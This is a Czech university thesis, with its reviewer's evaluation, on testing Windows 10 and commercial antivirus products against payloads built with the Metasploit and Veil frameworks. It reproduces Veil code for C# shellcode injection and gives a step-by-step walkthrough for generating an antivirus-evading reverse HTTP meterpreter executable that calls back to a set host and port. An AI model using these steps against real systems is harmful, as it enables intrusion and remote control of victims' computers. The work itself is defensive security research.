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Anotace Bezpečnost osobních dat se stává čím dál tím vyšší prioritou uživatelů.
Mnoho pravidel bezpečnosti těchto dat se týká využívání antivirové ochrany i na osobních počítačích. Praktickou částí této práce je otestování penetračních frameworků Metasploit a Veil, které jsou využívané pro simulaci útoků na cílové počítače, s využitím běžně dostupných antivirových řešení. Teoretická část práce se zabývá testováním antivirových ochran, způsobů,

kterých využívají penetrační testeři k proniknutí do cílového systému, popisu technik antivirových programů pro odhalování těchto aktivit a vysvětluje
problematiku penetračních testů. Jejím cílem je popsat, včetně ukázek, jakým způsobem jsou vytvářené spustitelné soubory, které provádějí uživatelem nechtěnou aktivitu, a jakých využívají technik pro skrytí se před antivirovými
programy.

Cílem práce je otestovat obrannou schopnost plně aktualizovaného operačního systému Windows ͳͲ se základním nastavením a s rozšířením o
antivirová řešení třetích stran. Na základě tohoto testu vypracovat závěr, který shrnuje úspěšnost penetračních frameworků Metasploit a Veil a tedy jejich reálnou využitelnost v penetračních testech.

Annotation

Antivirus testing using Kali and Veil and Metasploit

frameworks

Security of personal data is becoming increasingly important for users.

Basic security policies concern the use of anti-virus protection on personal

computers as well. The practical part of this work is testing penetrating

frameworks Metasploit and Veil, which are used to simulate cyber-attacks, using

commonly available antivirus solutions.

In the theoretical part are described antivirus protection techniques and

methods used by penetrating testers to bypass these solutions. The goal of this

part is to describe and show in examples, how executable files, which are used by

penetration testers to avoid antivirus detection are created.

The main goal is to test defensive ability of fully updated Windows 10

operating system with default settings and with an installed third-party antivirus

solution. Based on the results of this test the conclusion, which summarizes the

success of antivirus solutions, is created.
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1 Úvod Počet kybernetických útoků v domácích a podnikových sítích roste. Dle

serveru soca.cz v loňském roce čelilo téměř ͶͲ% počítačů v podnikové sféře
kybernetickému útoku z internetu (SOCA, 2017d). Některé české firmy vyvíjejí snahu zvyšovat svou interní bezpečnost pomocí vnitřních školení zaměstnanců, nasazování nových technologií, popř. navazují
spolupráci s bezpečnostními agenturami, které se zabývají zabezpečením
podnikových infrastruktur. Najmutí bezpečnostní agentury se mnohdy jeví jako příliš nákladné.
Společnosti za zvyšováním nákladů spojených se zabezpečením, proti stále se rozrůstajícím kybernetickým hrozbám, nevidí návratovou hodnotu a snaží se šetřit. Šetřivé chování zpomaluje proces zvyšování zabezpečení firmy, které může vést až
k zastarání bezpečnostních politik (SOCA, 2017c). Společnosti, které se aktivně nezajímají o kybernetickou bezpečnost, mohou

zvolit cestu dodržování předpisů, které mají zařídit minimální ochranu firemních dat. Tento způsob přístupu k aktualizacím je nebezpečný, jsou vynaloženy pouze prostředky spojené s dodržením předpisů. Na inovace a proaktivní přístup k možným
hrozbám pro konkrétní typ společnosti se již finance nedostanou. Dalším nebezpečím
je rychlost vývoje nových hrozeb, jejichž počet a komplexnost neustále roste. Předpisy na tyto změny nereagují s dostatečnou flexibilitou. Dle průzkumu Kaspersky
Lab a B2B International, není 63% organizací přesvědčeno o tom, že pouhé dodržování předpisů je pro bezpečnost společnosti dostatečné (SOCA, 2017b). Na základě tohoto průzkumu přijde firma vlivem jednoho kybernetického útoku průměrně o ͻʹ͸ ͲͲͲ dolarů. Z tohoto důvodu se dostává zpět otázka bezpečnostních
agentur, které mají zajistit zabezpečení firemních dat a komunikaci po síti. Společnost Eset vydala přehled nejčastějších hrozeb v České Republice. Dle

analýzy Check Pointu pochází nejvíce hrozeb z USA a Německa.
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Top 10 hrozeb v České republice za březen 2017 dle Esetu (SOCA, 2017a):

1. JS/Danger.ScriptAttachment (25,90 %)

2. JS/TrojanDownloader.Nemucod (8,84 %)

3. Java/GRat (5,48 %)

4. Win32/Adware.ELEX (4,60 %)

5. JS/Chromex.Submeliux (2,39 %)

6. Win32/Deceptor.AdvancedSystemCare (1,72 %)

7. Java/Adwind (1,59 %)

8. Win32/Packed.VMProtect.ABO (1,57 %)

9. Win32/Obfuscated.NIT (1,53 %)

10. Win32/Packed.VMProtect.AAA (1,43 %) Dle průzkumu (Hacktrophy, 2017) má ͶͶ% českých a slovenských společností zkušenost s kybernetickým útokem. V srpnu ʹͲͳ͹ se stal obětí kybernetického útoku

internetový obchod Mall.cz (DSL, 2017), kdy se povedlo útočníkům získat databázi hesel a emailů uživatelů, tj. cca ͹ͷͲ 000 uživatelských účtů. Internetový obchod
resetoval tato hesla a upozornil své uživatele na tento útok. Bohužel z běžného chování uživatele je patrné, že používá stejné, či podobné heslo na více internetových službách. Takový uživatel by si toto heslo měl změnit u všech přístupů, kde ho používá, nicméně k tomu u velkého procenta uživatelů nikdy nedojde. Za poslední rok

byly zjištěny útoky cílené na klienty ČSOB, České pošty i České spořitelny, do médií se
dostal i útok na české ministerstvo zahraničí. Dobrým způsobem, jak může společnost rychle hledat a opravovat bezpečností
chyby je zavedení Bug bounty programu. Programu, kde společnost platí za vyhledání
chyb ve svém systému a je jí umožněno na ně reagovat mnohem dříve. Jedná se často o méně finančně náročné řešení. Zdaleka největší hrozbou pro firemní sektor se jeví lidský faktor. Zkoumáním vlivu člověka na bezpečnost společností se zabývá sociální inženýrství. Tato věda zkoumá působení lidských subjektů na systém, snaží se hledat a analyzovat vzorce

lidského chování vzhledem k systému.
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Na základě této vědy dochází k nejkritičtějším útokům na data společností. Sebelepší kybernetické zabezpečení nedokáže odolat útoku osoby se všemi potřebnými přístupovými údaji a pověřeními. Za nejefektivnější přístup ke zjišťování hrozeb jsou považovány penetrační
testy, které tyto skryté hrozby pomáhají odhalit. Cílem těchto testů je problém
identifikovat a zhodnotit jeho vážnost. Vyhodnocení testu se provádí z pohledu útočníka, nejvyšší hodnocení tedy dostávají ty typy hrozeb, které mají největší šanci
na úspěch při napadení vybrané oběti. Pro penetrační testy existují softwarové frameworky, mnoho z nich zapadá do komplexních firemních řešení společností, poskytujících kybernetické bezpečnostní služby. Z dostupného software pro penetrační testy jsou zdarma dostupné

frameworky Metasploit nebo w3af. Bezpečnostní agentury si často vyvíjejí vlastní software pro hledání bezpečnostních děr. Na druhou stranu firmy samy mohou využít software, který je
zdarma a z části si tak ušetřit náklady spojené s najmutím bezpečností agentury. Ve světě bezpečnosti také platí, že každá bezpečnostní hrozba by se měla prověřit i několikrát, pak může být použití vlastního řešení dobrým doplňkem pro již nasazené bezpečnostní služby. Firma sama by se měla aktivně angažovat ve zvyšování bezpečnosti.

Kromě financí může napadená společnost přijít o mnohem více, jedná se o zhoršení její důvěryhodnosti. Od roku ʹͲͳͺ má vejít v platnost nová vyhláška, týkající se všech členských zemí EU, podle které je napadená společnost povinna při
jakémkoliv budoucím, probíhajícím, nebo již proběhlém kybernetickém útoku podat hlášení na příslušném orgánu státní správy. Při zjištění pochybení na straně společnosti, je možné ji udělit pokutu až ve výši ʹͲ mil. EU, nebo Ͷ% z ročního obratu.

4

2 Cíl práce Účelem práce je využít frameworky Metasploit a Veil pro otestování chování operačního systému Windows ͳͲ, jeho standardní antivirové ochrany a poté jeho

otestování s antivirovými programy třetích stran např. Avast Free Antivirus, Eset

Nod32 a Kaspersky Antivirus.


[…]


10. payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n"

%(hThreadName)

11.

12. elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

13.

14. payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)

15. payload_code += " if (%s != null) {\n" %(sName)

16. payload_code += ' UInt32 {} = HeapCreate(0x00040000,

(UInt32){}.Length, 0);\n'.format(pinfoName, sName)

17. payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008,

(UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)

18. payload_code += ' RtlMoveMemory({}, {},

(UInt32){}.Length);\n'.format(funcAddrName, sName, sName)

19. payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)

20. payload_code += ' IntPtr {} = CreateThread(0, 0, {},

IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName,

threadIdName)

21. payload_code += ' WaitForSingleObject({},

0xFFFFFFFF);}}}}\n'.format(hThreadName)

22. …
23. if self.required_options["INJECT_METHOD"][0].lower() == "virtual":

payload_code += """\t\t[DllImport(\"kernel32\")] private static

extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32

%s);\n[DllImport(\"kernel32\")]private static extern IntPtr

CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s,

ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern

UInt32 WaitForSingleObject(IntPtr %s, UInt32

https://github.com/Veil-Framework/Veil/blob/master/Tools/Evasion/payloads/cs/meterpreter/rev_tcp.py
https://github.com/Veil-Framework/Veil/blob/master/Tools/Evasion/payloads/cs/meterpreter/rev_tcp.py
https://github.com/Veil-Framework/Veil/blob/master/Tools/Evasion/payloads/cs/meterpreter/rev_tcp.py
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%s);}}\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10]

,r[11])

24. elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

payload_code += """\t\t[DllImport(\"kernel32\")] private static

extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s);

\n[DllImport(\"kernel32\")] private static extern UInt32

HeapAlloc(UInt32 %s, UInt32 %s, UInt32

%s);\n[DllImport(\"kernel32\")] private static extern UInt32

RtlMoveMemory(UInt32 %s, byte[] %s, UInt32

%s);\n[DllImport(\"kernel32\")] private static extern IntPtr

CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s,

ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern

UInt32 WaitForSingleObject(IntPtr %s, UInt32

%s);}}\n"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10]

,y[11],y[12],y[13],y[14],y[15],y[16])
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 Ukázka vytvoření payload ve frameworku Veil 9.9

Tato ukázka popisuje, jak vytvořit C# reverse http payload ve frameworku
Veil. Výstupem je spustitelný ȋ.exeȌ soubor, který se po spuštění připojí ke vzdálenému hostu a naváže plné spojení s meterpreter session.

- Vzdálená IP adresa: 169.254.210.161

- Port, na který se skript připojí: 80 Následující obrázky jsou pořízeny z operačního systému Kali Linux, pro běh
Veil frameworku je nutný Python 3. Spustit Veil je možné z příkazové řádky z místa, kam je Veil stažený. Jeho stažení je možné z oficiálního Github repozitáře:

- https://github.com/Veil-Framework/Veil

Obrázek 24 – Spuštění Veil frameworku

https://github.com/Veil-Framework/Veil
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Obrázek 25 - Spuštěný Veil

Po spuštění Veilu, jak je vidět na Obrázku 25 - Spuštěný Veil. Je možné
pracovat s programem v jednoduchém grafickém rozhraní. Po napsání příkazu list se zobrazí seznam dvou základních nástrojů Veil:

1) Ordnance

o Generuje payloads pomocí msfvenom

2) Evasion

o Generuje vlastní payloads s účelem skrytí před antivirovým řešením Pomocí příkazu use 2 se uživatel dostane do nabídky Veil Evasion, jak je vidět v následujícím obrázku.

Obrázek 26 - Veil Evasion
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Příkazem list se zobrazí seznam všech payloads, které je možné
vygenerovat.

Obrázek 27 - Veil payloads

Příkazem use 9 se uživatel dostane do nabídky generování C# reverse http

payloadu. A pomocí příkazů set je možné nastavit základní údaje k tomuto payload.

Obrázek 28 - Veil C# rev http
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- Set LHOST 169.254.210.1

- Set LPORT 80

- Další nastavení jako USE_ARYA Y, jsou volitelná

- Generate pro pokračování
Další nabídka vyzývá k pojmenování payload. Autor vybral pojmenování

howToCreateVirus a takto vypadá následující obrazovka.

Obrázek 29 - Generated file info
Informuje o cestě, kam by soubor vytvořen a jeho části, Veil také generuje pro každý payload handler, který je možné spustit v Metasploit frameworku, aby uživatel nemusel pokaždé všechno ručně nastavovat. Zdrojový kód, který vygeneroval Veil vypadá následovně.

Obrázek 30 - C# zdrojový kód
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