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Povinná kritéria hodnocení práce
Stupeň hodnocení (známka)

A B C D E F

Práce svým zaměřením odpovídá studovanému oboru ☒ ☐ ☐ ☐ ☐ ☐

Vymezení cíle a jeho naplnění ☒ ☐ ☐ ☐ ☐ ☐

Zpracování teoretických aspektů tématu ☒ ☐ ☐ ☐ ☐ ☐

Zpracování praktických aspektů tématu ☒ ☐ ☐ ☐ ☐ ☐

Adekvátnost použitých metod, způsob jejich použití ☒ ☐ ☐ ☐ ☐ ☐

Hloubka a správnost provedené analýzy ☒ ☐ ☐ ☐ ☐ ☐

Práce s literaturou ☒ ☐ ☐ ☐ ☐ ☐

Logická stavba a členění práce ☒ ☐ ☐ ☐ ☐ ☐

Jazyková a terminologická úroveň ☐ ☐ ☒ ☒ ☐ ☐

Formální úprava a náležitosti práce ☒ ☐ ☐ ☐ ☐ ☐

Vlastní přínos studenta ☒ ☐ ☐ ☐ ☐ ☐

Využitelnost výsledků práce v teorii (v praxi) ☒ ☐ ☐ ☐ ☐ ☐

Vyjádření k výsledku anti-plagiátorské kontroly

Práce v rámci kontroly anti-plagiátorským systémem nevykazuje žádné nedostatky.

Dílčí připomínky a náměty:

Práce obsahuje četné překlepy. Místy má autor méně srozumitelné vyjadřování, což činí text pro
čtenáře hůře čitelným.

Celkové posouzení práce a zdůvodnění výsledné známky:

V teoretické části autor popisuje možnosti škodlivého kódu, odlišnosti a způsob práce jednotlivých
antivirových řešení a vybírá vhodné frameworky pro penetrační testování. V praktické části autor
podrobně popisuje nastavení a postupy (včetně použitých verzí programů, OS, nastavení Virtualboxu,
IP adres atd.), kterými prováděl testování zabezpečení jednotlivých virtuálních prostředí.

Autor se věnuje aktuální problematice, výsledky a srovnání úspěšností útoků pro systémy
s různým typem ochrany jsou velmi zajímavé. Práce je dosti obsáhlá, odpovídá metodickým pokynům
pro vypracování kvalifikačních prací. Autor prokazuje hluboké znalosti problematiky. Uvedené cíle
práce byly naplněny.

Otázky k obhajobě:

1. Podle jakého klíče jste vybíral jednotlivá antivirová řešení pro další analýzu a testování?
2. Plánujete upozornit jednotlivé společnosti na výsledky Vaší práce?

Práci doporučuji k obhajobě.

Navržená výsledná známka: A

V Hradci Králové, dne 20. května 2018
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